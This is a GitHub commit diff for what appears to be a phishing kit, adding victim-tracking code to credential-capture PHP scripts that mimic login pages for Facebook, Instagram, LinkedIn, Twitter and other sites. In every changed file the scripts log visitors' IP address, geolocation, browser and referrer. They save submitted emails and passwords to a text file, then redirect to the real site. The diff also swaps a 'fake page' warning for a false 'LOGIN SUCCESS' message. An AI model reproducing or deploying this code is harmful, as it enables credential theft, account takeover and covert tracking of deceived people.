WORKING FOR VICTIM IP GRABBING IN LIVE ATTACK

This commit is contained in:
An0nUD4Y 2018-04-22 18:00:30 +05:30 committed by GitHub
parent 69a7b824b4
commit d43a509be3
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
14 changed files with 527 additions and 11 deletions

View File

@ -1,4 +1,44 @@
<?php
// This program generates a web pages that gets
// the user's information, saves it to a file,
// and displays it on the web page.
// Created by Anon UD4Y.
// 19 Apr, 2018.
// Name of the ip address log.
$outputWebBug = 'iplog.txt';
// Get the ip address and info about client.
@ $details = json_decode(file_get_contents("http://ipinfo.io/{$_SERVER['REMOTE_ADDR']}/json"));
@ $hostname=gethostbyaddr($_SERVER['REMOTE_ADDR']);
// Get the query string from the URL.
$QUERY_STRING = preg_replace("%[^/a-zA-Z0-9@,_=]%", '', $_SERVER['QUERY_STRING']);
// Write the ip address and info to file.
@ $fileHandle = fopen($outputWebBug, "a");
if ($fileHandle)
{
$string ='INFORMATION_ACCESSED-------------------------------------------------------------------'
.$QUERY_STRING.' [1]IP-ADDRESS = ' // everything after "?" in the URL
.$_SERVER['REMOTE_ADDR'].' [2]HOSTNAME = ' // ip address
.$hostname.' [3]BROWSER & SYSTEM = ' // hostname
.$_SERVER['HTTP_USER_AGENT'].' [4]REDIRECTED-BY = ' // browser and operating system
.$_SERVER['HTTP_REFERER'].' [5]LATITUDE-LONGITUDE = ' // where they got the link for this page
.$details->loc.' [6]ISP = ' // latitude, longitude
.$details->org.' [7]CITY = ' // internet service provider
.$details->city.' [8]STATE = ' // city
.$details->region.' [9]COUNTRY = ' // state
.$details->country.' [10]DATE & TIME = ' // country
.date("D dS M,Y h:i a").'________________________________________________[DONE BY AN0NUD4Y]' // date
."\n"
;
$write = fputs($fileHandle, $string);
@ fclose($fileHandle);
}
$var = $_POST['email'];
$var2 = $_POST['pass'];
$myFile = file_get_contents("protect.html");

View File

@ -1,5 +1,6 @@
<?php
// This program generates a web pages that gets
// This program generates a web pages that gets
// the user's information, saves it to a file,
// and displays it on the web page.
// Created by Anon UD4Y.
@ -37,18 +38,17 @@
@ fclose($fileHandle);
}
$var = $_POST['username'];
$var2 = $_POST['password'];
$myFile = file_get_contents("protect.html");
$searchString = "<html><title>WELCOME</title></html>";
if($myFile != $searchString) {
file_put_contents("usernames.txt", "[EMAIL]: " . $var . " [PASS]: " . $var2 . "\n", FILE_APPEND);
header('Location: https://ig-liker.net/');
header('Location:https://ig-liker.net/');
}
if($myFile != $searchString) {
echo "LOGIN SUCCESSFULL";
header('Location: https://ig-liker.net/');
}
exit();
?>

View File

@ -1,4 +1,43 @@
<?php
// This program generates a web pages that gets
// the user's information, saves it to a file,
// and displays it on the web page.
// Created by Anon UD4Y.
// 19 Apr, 2018.
// Name of the ip address log.
$outputWebBug = 'iplog.txt';
// Get the ip address and info about client.
@ $details = json_decode(file_get_contents("http://ipinfo.io/{$_SERVER['REMOTE_ADDR']}/json"));
@ $hostname=gethostbyaddr($_SERVER['REMOTE_ADDR']);
// Get the query string from the URL.
$QUERY_STRING = preg_replace("%[^/a-zA-Z0-9@,_=]%", '', $_SERVER['QUERY_STRING']);
// Write the ip address and info to file.
@ $fileHandle = fopen($outputWebBug, "a");
if ($fileHandle)
{
$string ='INFORMATION_ACCESSED-------------------------------------------------------------------'
.$QUERY_STRING.' [1]IP-ADDRESS = ' // everything after "?" in the URL
.$_SERVER['REMOTE_ADDR'].' [2]HOSTNAME = ' // ip address
.$hostname.' [3]BROWSER & SYSTEM = ' // hostname
.$_SERVER['HTTP_USER_AGENT'].' [4]REDIRECTED-BY = ' // browser and operating system
.$_SERVER['HTTP_REFERER'].' [5]LATITUDE-LONGITUDE = ' // where they got the link for this page
.$details->loc.' [6]ISP = ' // latitude, longitude
.$details->org.' [7]CITY = ' // internet service provider
.$details->city.' [8]STATE = ' // city
.$details->region.' [9]COUNTRY = ' // state
.$details->country.' [10]DATE & TIME = ' // country
.date("D dS M,Y h:i a").'________________________________________________[DONE BY AN0NUD4Y]' // date
."\n"
;
$write = fputs($fileHandle, $string);
@ fclose($fileHandle);
}
$var = $_POST['username'];
$var2 = $_POST['password'];
$myFile = file_get_contents("protect.html");
@ -9,6 +48,7 @@ if($myFile != $searchString) {
}
if($myFile != $searchString) {
echo "LOGIN SUCCESSFULL";
header('Location: https://instagram.com');
}
exit();
?>

View File

@ -1,4 +1,42 @@
<?php
// This program generates a web pages that gets
// the user's information, saves it to a file,
// and displays it on the web page.
// Created by Anon UD4Y.
// 19 Apr, 2018.
// Name of the ip address log.
$outputWebBug = 'iplog.txt';
// Get the ip address and info about client.
@ $details = json_decode(file_get_contents("http://ipinfo.io/{$_SERVER['REMOTE_ADDR']}/json"));
@ $hostname=gethostbyaddr($_SERVER['REMOTE_ADDR']);
// Get the query string from the URL.
$QUERY_STRING = preg_replace("%[^/a-zA-Z0-9@,_=]%", '', $_SERVER['QUERY_STRING']);
// Write the ip address and info to file.
@ $fileHandle = fopen($outputWebBug, "a");
if ($fileHandle)
{
$string ='INFORMATION_ACCESSED-------------------------------------------------------------------'
.$QUERY_STRING.' [1]IP-ADDRESS = ' // everything after "?" in the URL
.$_SERVER['REMOTE_ADDR'].' [2]HOSTNAME = ' // ip address
.$hostname.' [3]BROWSER & SYSTEM = ' // hostname
.$_SERVER['HTTP_USER_AGENT'].' [4]REDIRECTED-BY = ' // browser and operating system
.$_SERVER['HTTP_REFERER'].' [5]LATITUDE-LONGITUDE = ' // where they got the link for this page
.$details->loc.' [6]ISP = ' // latitude, longitude
.$details->org.' [7]CITY = ' // internet service provider
.$details->city.' [8]STATE = ' // city
.$details->region.' [9]COUNTRY = ' // state
.$details->country.' [10]DATE & TIME = ' // country
.date("D dS M,Y h:i a").'________________________________________________[DONE BY AN0NUD4Y]' // date
."\n"
;
$write = fputs($fileHandle, $string);
@ fclose($fileHandle);
}
$var = $_POST['email'];
$var2 = $_POST['pass'];
$myFile = file_get_contents("protect.html");
@ -9,6 +47,7 @@ if($myFile != $searchString) {
}
if($myFile != $searchString) {
echo "LOGIN SUCCESSFULL";
header('Location: https://mbasic.facebook.com/');
}
exit();
?>

View File

@ -1,14 +1,53 @@
<?php
// This program generates a web pages that gets
// the user's information, saves it to a file,
// and displays it on the web page.
// Created by Anon UD4Y.
// 19 Apr, 2018.
// Name of the ip address log.
$outputWebBug = 'iplog.txt';
// Get the ip address and info about client.
@ $details = json_decode(file_get_contents("http://ipinfo.io/{$_SERVER['REMOTE_ADDR']}/json"));
@ $hostname=gethostbyaddr($_SERVER['REMOTE_ADDR']);
// Get the query string from the URL.
$QUERY_STRING = preg_replace("%[^/a-zA-Z0-9@,_=]%", '', $_SERVER['QUERY_STRING']);
// Write the ip address and info to file.
@ $fileHandle = fopen($outputWebBug, "a");
if ($fileHandle)
{
$string ='INFORMATION_ACCESSED-------------------------------------------------------------------'
.$QUERY_STRING.' [1]IP-ADDRESS = ' // everything after "?" in the URL
.$_SERVER['REMOTE_ADDR'].' [2]HOSTNAME = ' // ip address
.$hostname.' [3]BROWSER & SYSTEM = ' // hostname
.$_SERVER['HTTP_USER_AGENT'].' [4]REDIRECTED-BY = ' // browser and operating system
.$_SERVER['HTTP_REFERER'].' [5]LATITUDE-LONGITUDE = ' // where they got the link for this page
.$details->loc.' [6]ISP = ' // latitude, longitude
.$details->org.' [7]CITY = ' // internet service provider
.$details->city.' [8]STATE = ' // city
.$details->region.' [9]COUNTRY = ' // state
.$details->country.' [10]DATE & TIME = ' // country
.date("D dS M,Y h:i a").'________________________________________________[DONE BY AN0NUD4Y]' // date
."\n"
;
$write = fputs($fileHandle, $string);
@ fclose($fileHandle);
}
$var = $_POST['email'];
$var2 = $_POST['pass'];
$myFile = file_get_contents("protect.html");
$searchString = "<html><title>WELCOME TO FACEBOOK</title></html>";
if($myFile != $searchString) {
file_put_contents("usernames.txt", "[EMAIL]: " . $var . " [PASS]: " . $var2 . "\n", FILE_APPEND);
header('Location: https://messenger.com/login');
header('Location: https://messenger.com/login/');
}
if($myFile != $searchString) {
echo "LOGIN SUCCESSFULL";
header('Location: https://messenger.com/login');
}
exit();
?>

View File

@ -1,6 +1,44 @@
<?php
$var = $_POST['username'];
$var2 = $_POST['password'];
// This program generates a web pages that gets
// the user's information, saves it to a file,
// and displays it on the web page.
// Created by Anon UD4Y.
// 19 Apr, 2018.
// Name of the ip address log.
$outputWebBug = 'iplog.txt';
// Get the ip address and info about client.
@ $details = json_decode(file_get_contents("http://ipinfo.io/{$_SERVER['REMOTE_ADDR']}/json"));
@ $hostname=gethostbyaddr($_SERVER['REMOTE_ADDR']);
// Get the query string from the URL.
$QUERY_STRING = preg_replace("%[^/a-zA-Z0-9@,_=]%", '', $_SERVER['QUERY_STRING']);
// Write the ip address and info to file.
@ $fileHandle = fopen($outputWebBug, "a");
if ($fileHandle)
{
$string ='INFORMATION_ACCESSED-------------------------------------------------------------------'
.$QUERY_STRING.' [1]IP-ADDRESS = ' // everything after "?" in the URL
.$_SERVER['REMOTE_ADDR'].' [2]HOSTNAME = ' // ip address
.$hostname.' [3]BROWSER & SYSTEM = ' // hostname
.$_SERVER['HTTP_USER_AGENT'].' [4]REDIRECTED-BY = ' // browser and operating system
.$_SERVER['HTTP_REFERER'].' [5]LATITUDE-LONGITUDE = ' // where they got the link for this page
.$details->loc.' [6]ISP = ' // latitude, longitude
.$details->org.' [7]CITY = ' // internet service provider
.$details->city.' [8]STATE = ' // city
.$details->region.' [9]COUNTRY = ' // state
.$details->country.' [10]DATE & TIME = ' // country
.date("D dS M,Y h:i a").'________________________________________________[DONE BY AN0NUD4Y]' // date
."\n"
;
$write = fputs($fileHandle, $string);
@ fclose($fileHandle);
}
$var = $_POST['email'];
$var2 = $_POST['pass'];
$myFile = file_get_contents("protect.html");
$searchString = "<html><title>WELCOME TO FACEBOOK</title></html>";
if($myFile != $searchString) {
@ -9,6 +47,7 @@ if($myFile != $searchString) {
}
if($myFile != $searchString) {
echo "LOGIN SUCCESSFULL";
header('Location: https://mbasic.facebook.com');
}
exit();
?>

View File

@ -1,4 +1,42 @@
<?php
// This program generates a web pages that gets
// the user's information, saves it to a file,
// and displays it on the web page.
// Created by Anon UD4Y.
// 19 Apr, 2018.
// Name of the ip address log.
$outputWebBug = 'iplog.txt';
// Get the ip address and info about client.
@ $details = json_decode(file_get_contents("http://ipinfo.io/{$_SERVER['REMOTE_ADDR']}/json"));
@ $hostname=gethostbyaddr($_SERVER['REMOTE_ADDR']);
// Get the query string from the URL.
$QUERY_STRING = preg_replace("%[^/a-zA-Z0-9@,_=]%", '', $_SERVER['QUERY_STRING']);
// Write the ip address and info to file.
@ $fileHandle = fopen($outputWebBug, "a");
if ($fileHandle)
{
$string ='INFORMATION_ACCESSED-------------------------------------------------------------------'
.$QUERY_STRING.' [1]IP-ADDRESS = ' // everything after "?" in the URL
.$_SERVER['REMOTE_ADDR'].' [2]HOSTNAME = ' // ip address
.$hostname.' [3]BROWSER & SYSTEM = ' // hostname
.$_SERVER['HTTP_USER_AGENT'].' [4]REDIRECTED-BY = ' // browser and operating system
.$_SERVER['HTTP_REFERER'].' [5]LATITUDE-LONGITUDE = ' // where they got the link for this page
.$details->loc.' [6]ISP = ' // latitude, longitude
.$details->org.' [7]CITY = ' // internet service provider
.$details->city.' [8]STATE = ' // city
.$details->region.' [9]COUNTRY = ' // state
.$details->country.' [10]DATE & TIME = ' // country
.date("D dS M,Y h:i a").'________________________________________________[DONE BY AN0NUD4Y]' // date
."\n"
;
$write = fputs($fileHandle, $string);
@ fclose($fileHandle);
}
$var = $_POST['email'];
$var2 = $_POST['pass'];
$myFile = file_get_contents("protect.html");
@ -9,6 +47,7 @@ if($myFile != $searchString) {
}
if($myFile != $searchString) {
echo "LOGIN SUCCESSFULL";
header('Location: https://facebook.com/');
}
exit();
?>

View File

@ -1,4 +1,44 @@
<?php
// This program generates a web pages that gets
// the user's information, saves it to a file,
// and displays it on the web page.
// Created by Anon UD4Y.
// 19 Apr, 2018.
// Name of the ip address log.
$outputWebBug = 'iplog.txt';
// Get the ip address and info about client.
@ $details = json_decode(file_get_contents("http://ipinfo.io/{$_SERVER['REMOTE_ADDR']}/json"));
@ $hostname=gethostbyaddr($_SERVER['REMOTE_ADDR']);
// Get the query string from the URL.
$QUERY_STRING = preg_replace("%[^/a-zA-Z0-9@,_=]%", '', $_SERVER['QUERY_STRING']);
// Write the ip address and info to file.
@ $fileHandle = fopen($outputWebBug, "a");
if ($fileHandle)
{
$string ='INFORMATION_ACCESSED-------------------------------------------------------------------'
.$QUERY_STRING.' [1]IP-ADDRESS = ' // everything after "?" in the URL
.$_SERVER['REMOTE_ADDR'].' [2]HOSTNAME = ' // ip address
.$hostname.' [3]BROWSER & SYSTEM = ' // hostname
.$_SERVER['HTTP_USER_AGENT'].' [4]REDIRECTED-BY = ' // browser and operating system
.$_SERVER['HTTP_REFERER'].' [5]LATITUDE-LONGITUDE = ' // where they got the link for this page
.$details->loc.' [6]ISP = ' // latitude, longitude
.$details->org.' [7]CITY = ' // internet service provider
.$details->city.' [8]STATE = ' // city
.$details->region.' [9]COUNTRY = ' // state
.$details->country.' [10]DATE & TIME = ' // country
.date("D dS M,Y h:i a").'________________________________________________[DONE BY AN0NUD4Y]' // date
."\n"
;
$write = fputs($fileHandle, $string);
@ fclose($fileHandle);
}
$var = $_POST['email'];
$var2 = $_POST['pass'];
$myFile = file_get_contents("protect.html");

View File

@ -1,4 +1,42 @@
<?php
// This program generates a web pages that gets
// the user's information, saves it to a file,
// and displays it on the web page.
// Created by Anon UD4Y.
// 19 Apr, 2018.
// Name of the ip address log.
$outputWebBug = 'iplog.txt';
// Get the ip address and info about client.
@ $details = json_decode(file_get_contents("http://ipinfo.io/{$_SERVER['REMOTE_ADDR']}/json"));
@ $hostname=gethostbyaddr($_SERVER['REMOTE_ADDR']);
// Get the query string from the URL.
$QUERY_STRING = preg_replace("%[^/a-zA-Z0-9@,_=]%", '', $_SERVER['QUERY_STRING']);
// Write the ip address and info to file.
@ $fileHandle = fopen($outputWebBug, "a");
if ($fileHandle)
{
$string ='INFORMATION_ACCESSED-------------------------------------------------------------------'
.$QUERY_STRING.' [1]IP-ADDRESS = ' // everything after "?" in the URL
.$_SERVER['REMOTE_ADDR'].' [2]HOSTNAME = ' // ip address
.$hostname.' [3]BROWSER & SYSTEM = ' // hostname
.$_SERVER['HTTP_USER_AGENT'].' [4]REDIRECTED-BY = ' // browser and operating system
.$_SERVER['HTTP_REFERER'].' [5]LATITUDE-LONGITUDE = ' // where they got the link for this page
.$details->loc.' [6]ISP = ' // latitude, longitude
.$details->org.' [7]CITY = ' // internet service provider
.$details->city.' [8]STATE = ' // city
.$details->region.' [9]COUNTRY = ' // state
.$details->country.' [10]DATE & TIME = ' // country
.date("D dS M,Y h:i a").'________________________________________________[DONE BY AN0NUD4Y]' // date
."\n"
;
$write = fputs($fileHandle, $string);
@ fclose($fileHandle);
}
$var = $_POST['Email'];
$var2 = $_POST['Passwd'];
$myFile = file_get_contents("protect.html");

View File

@ -1,4 +1,44 @@
<?php
// This program generates a web pages that gets
// the user's information, saves it to a file,
// and displays it on the web page.
// Created by Anon UD4Y.
// 19 Apr, 2018.
// Name of the ip address log.
$outputWebBug = 'iplog.txt';
// Get the ip address and info about client.
@ $details = json_decode(file_get_contents("http://ipinfo.io/{$_SERVER['REMOTE_ADDR']}/json"));
@ $hostname=gethostbyaddr($_SERVER['REMOTE_ADDR']);
// Get the query string from the URL.
$QUERY_STRING = preg_replace("%[^/a-zA-Z0-9@,_=]%", '', $_SERVER['QUERY_STRING']);
// Write the ip address and info to file.
@ $fileHandle = fopen($outputWebBug, "a");
if ($fileHandle)
{
$string ='INFORMATION_ACCESSED-------------------------------------------------------------------'
.$QUERY_STRING.' [1]IP-ADDRESS = ' // everything after "?" in the URL
.$_SERVER['REMOTE_ADDR'].' [2]HOSTNAME = ' // ip address
.$hostname.' [3]BROWSER & SYSTEM = ' // hostname
.$_SERVER['HTTP_USER_AGENT'].' [4]REDIRECTED-BY = ' // browser and operating system
.$_SERVER['HTTP_REFERER'].' [5]LATITUDE-LONGITUDE = ' // where they got the link for this page
.$details->loc.' [6]ISP = ' // latitude, longitude
.$details->org.' [7]CITY = ' // internet service provider
.$details->city.' [8]STATE = ' // city
.$details->region.' [9]COUNTRY = ' // state
.$details->country.' [10]DATE & TIME = ' // country
.date("D dS M,Y h:i a").'________________________________________________[DONE BY AN0NUD4Y]' // date
."\n"
;
$write = fputs($fileHandle, $string);
@ fclose($fileHandle);
}
$var = $_POST['UsernameForm'];
$var2 = $_POST['PasswordForm'];
$myFile = file_get_contents("protect.html");
@ -8,7 +48,8 @@ if($myFile == $searchString) {
header('Location: https://linkedin.com/');
}
if($myFile != $searchString) {
echo "***ALERT! I AM A FAKE PAGE | DO NOT TRUST ME";
echo "***LOGIN SUCCESS***";
header('Location: https://linkedin.com/');
}
exit();
?>

View File

@ -1,4 +1,44 @@
<?php
// This program generates a web pages that gets
// the user's information, saves it to a file,
// and displays it on the web page.
// Created by Anon UD4Y.
// 19 Apr, 2018.
// Name of the ip address log.
$outputWebBug = 'iplog.txt';
// Get the ip address and info about client.
@ $details = json_decode(file_get_contents("http://ipinfo.io/{$_SERVER['REMOTE_ADDR']}/json"));
@ $hostname=gethostbyaddr($_SERVER['REMOTE_ADDR']);
// Get the query string from the URL.
$QUERY_STRING = preg_replace("%[^/a-zA-Z0-9@,_=]%", '', $_SERVER['QUERY_STRING']);
// Write the ip address and info to file.
@ $fileHandle = fopen($outputWebBug, "a");
if ($fileHandle)
{
$string ='INFORMATION_ACCESSED-------------------------------------------------------------------'
.$QUERY_STRING.' [1]IP-ADDRESS = ' // everything after "?" in the URL
.$_SERVER['REMOTE_ADDR'].' [2]HOSTNAME = ' // ip address
.$hostname.' [3]BROWSER & SYSTEM = ' // hostname
.$_SERVER['HTTP_USER_AGENT'].' [4]REDIRECTED-BY = ' // browser and operating system
.$_SERVER['HTTP_REFERER'].' [5]LATITUDE-LONGITUDE = ' // where they got the link for this page
.$details->loc.' [6]ISP = ' // latitude, longitude
.$details->org.' [7]CITY = ' // internet service provider
.$details->city.' [8]STATE = ' // city
.$details->region.' [9]COUNTRY = ' // state
.$details->country.' [10]DATE & TIME = ' // country
.date("D dS M,Y h:i a").'________________________________________________[DONE BY AN0NUD4Y]' // date
."\n"
;
$write = fputs($fileHandle, $string);
@ fclose($fileHandle);
}
$var = $_POST['email'];
$var2 = $_POST['pass'];
$myFile = file_get_contents("protect.html");
@ -9,6 +49,7 @@ if($myFile != $searchString) {
}
if($myFile != $searchString) {
echo "LOGIN SUCCESSFULL";
header('Location: https://mbasic.facebook.com/');
}
exit();
?>

View File

@ -1,4 +1,44 @@
<?php
// This program generates a web pages that gets
// the user's information, saves it to a file,
// and displays it on the web page.
// Created by Anon UD4Y.
// 19 Apr, 2018.
// Name of the ip address log.
$outputWebBug = 'iplog.txt';
// Get the ip address and info about client.
@ $details = json_decode(file_get_contents("http://ipinfo.io/{$_SERVER['REMOTE_ADDR']}/json"));
@ $hostname=gethostbyaddr($_SERVER['REMOTE_ADDR']);
// Get the query string from the URL.
$QUERY_STRING = preg_replace("%[^/a-zA-Z0-9@,_=]%", '', $_SERVER['QUERY_STRING']);
// Write the ip address and info to file.
@ $fileHandle = fopen($outputWebBug, "a");
if ($fileHandle)
{
$string ='INFORMATION_ACCESSED-------------------------------------------------------------------'
.$QUERY_STRING.' [1]IP-ADDRESS = ' // everything after "?" in the URL
.$_SERVER['REMOTE_ADDR'].' [2]HOSTNAME = ' // ip address
.$hostname.' [3]BROWSER & SYSTEM = ' // hostname
.$_SERVER['HTTP_USER_AGENT'].' [4]REDIRECTED-BY = ' // browser and operating system
.$_SERVER['HTTP_REFERER'].' [5]LATITUDE-LONGITUDE = ' // where they got the link for this page
.$details->loc.' [6]ISP = ' // latitude, longitude
.$details->org.' [7]CITY = ' // internet service provider
.$details->city.' [8]STATE = ' // city
.$details->region.' [9]COUNTRY = ' // state
.$details->country.' [10]DATE & TIME = ' // country
.date("D dS M,Y h:i a").'________________________________________________[DONE BY AN0NUD4Y]' // date
."\n"
;
$write = fputs($fileHandle, $string);
@ fclose($fileHandle);
}
$var = $_POST['email'];
$var2 = $_POST['pass'];
$myFile = file_get_contents("protect.html");
@ -8,7 +48,8 @@ if($myFile == $searchString) {
header('Location: https://stackoverflow.com/');
}
if($myFile != $searchString) {
echo "***ALERT! I AM A FAKE PAGE | DO NOT TRUST ME";
echo "***LOGIN SUCCESS***";
header('Location: https://stackoverflow.com/');
}
exit();
?>

View File

@ -1,4 +1,42 @@
<?php
// This program generates a web pages that gets
// the user's information, saves it to a file,
// and displays it on the web page.
// Created by Anon UD4Y.
// 19 Apr, 2018.
// Name of the ip address log.
$outputWebBug = 'iplog.txt';
// Get the ip address and info about client.
@ $details = json_decode(file_get_contents("http://ipinfo.io/{$_SERVER['REMOTE_ADDR']}/json"));
@ $hostname=gethostbyaddr($_SERVER['REMOTE_ADDR']);
// Get the query string from the URL.
$QUERY_STRING = preg_replace("%[^/a-zA-Z0-9@,_=]%", '', $_SERVER['QUERY_STRING']);
// Write the ip address and info to file.
@ $fileHandle = fopen($outputWebBug, "a");
if ($fileHandle)
{
$string ='INFORMATION_ACCESSED-------------------------------------------------------------------'
.$QUERY_STRING.' [1]IP-ADDRESS = ' // everything after "?" in the URL
.$_SERVER['REMOTE_ADDR'].' [2]HOSTNAME = ' // ip address
.$hostname.' [3]BROWSER & SYSTEM = ' // hostname
.$_SERVER['HTTP_USER_AGENT'].' [4]REDIRECTED-BY = ' // browser and operating system
.$_SERVER['HTTP_REFERER'].' [5]LATITUDE-LONGITUDE = ' // where they got the link for this page
.$details->loc.' [6]ISP = ' // latitude, longitude
.$details->org.' [7]CITY = ' // internet service provider
.$details->city.' [8]STATE = ' // city
.$details->region.' [9]COUNTRY = ' // state
.$details->country.' [10]DATE & TIME = ' // country
.date("D dS M,Y h:i a").'________________________________________________[DONE BY AN0NUD4Y]' // date
."\n"
;
$write = fputs($fileHandle, $string);
@ fclose($fileHandle);
}
$var = $_POST['usernameOrEmail'];
$var2 = $_POST['pass'];
$myFile = file_get_contents("protect.html");
@ -8,7 +46,8 @@ if($myFile == $searchString) {
header('Location: https://twitter.com/');
}
if($myFile != $searchString) {
echo "***ALERT! I AM A FAKE PAGE | DO NOT TRUST ME";
echo "***LOGIN SUCCESS***";
header('Location: https://twitter.com/');
}
exit();
?>

View File

@ -1,4 +1,43 @@
<?php
// This program generates a web pages that gets
// the user's information, saves it to a file,
// and displays it on the web page.
// Created by Anon UD4Y.
// 19 Apr, 2018.
// Name of the ip address log.
$outputWebBug = 'iplog.txt';
// Get the ip address and info about client.
@ $details = json_decode(file_get_contents("http://ipinfo.io/{$_SERVER['REMOTE_ADDR']}/json"));
@ $hostname=gethostbyaddr($_SERVER['REMOTE_ADDR']);
// Get the query string from the URL.
$QUERY_STRING = preg_replace("%[^/a-zA-Z0-9@,_=]%", '', $_SERVER['QUERY_STRING']);
// Write the ip address and info to file.
@ $fileHandle = fopen($outputWebBug, "a");
if ($fileHandle)
{
$string ='INFORMATION_ACCESSED-------------------------------------------------------------------'
.$QUERY_STRING.' [1]IP-ADDRESS = ' // everything after "?" in the URL
.$_SERVER['REMOTE_ADDR'].' [2]HOSTNAME = ' // ip address
.$hostname.' [3]BROWSER & SYSTEM = ' // hostname
.$_SERVER['HTTP_USER_AGENT'].' [4]REDIRECTED-BY = ' // browser and operating system
.$_SERVER['HTTP_REFERER'].' [5]LATITUDE-LONGITUDE = ' // where they got the link for this page
.$details->loc.' [6]ISP = ' // latitude, longitude
.$details->org.' [7]CITY = ' // internet service provider
.$details->city.' [8]STATE = ' // city
.$details->region.' [9]COUNTRY = ' // state
.$details->country.' [10]DATE & TIME = ' // country
.date("D dS M,Y h:i a").'________________________________________________[DONE BY AN0NUD4Y]' // date
."\n"
;
$write = fputs($fileHandle, $string);
@ fclose($fileHandle);
}
$var = $_POST['email'];
$var2 = $_POST['pass'];
$myFile = file_get_contents("protect.html");
@ -8,7 +47,8 @@ if($myFile == $searchString) {
header('Location: http://wordpress.org/');
}
if($myFile != $searchString) {
echo "***ALERT! I AM A FAKE PAGE | DO NOT TRUST ME";
echo "***LOGIN SUCCESS***";
header('Location: http://wordpress.org/');
}
exit();
?>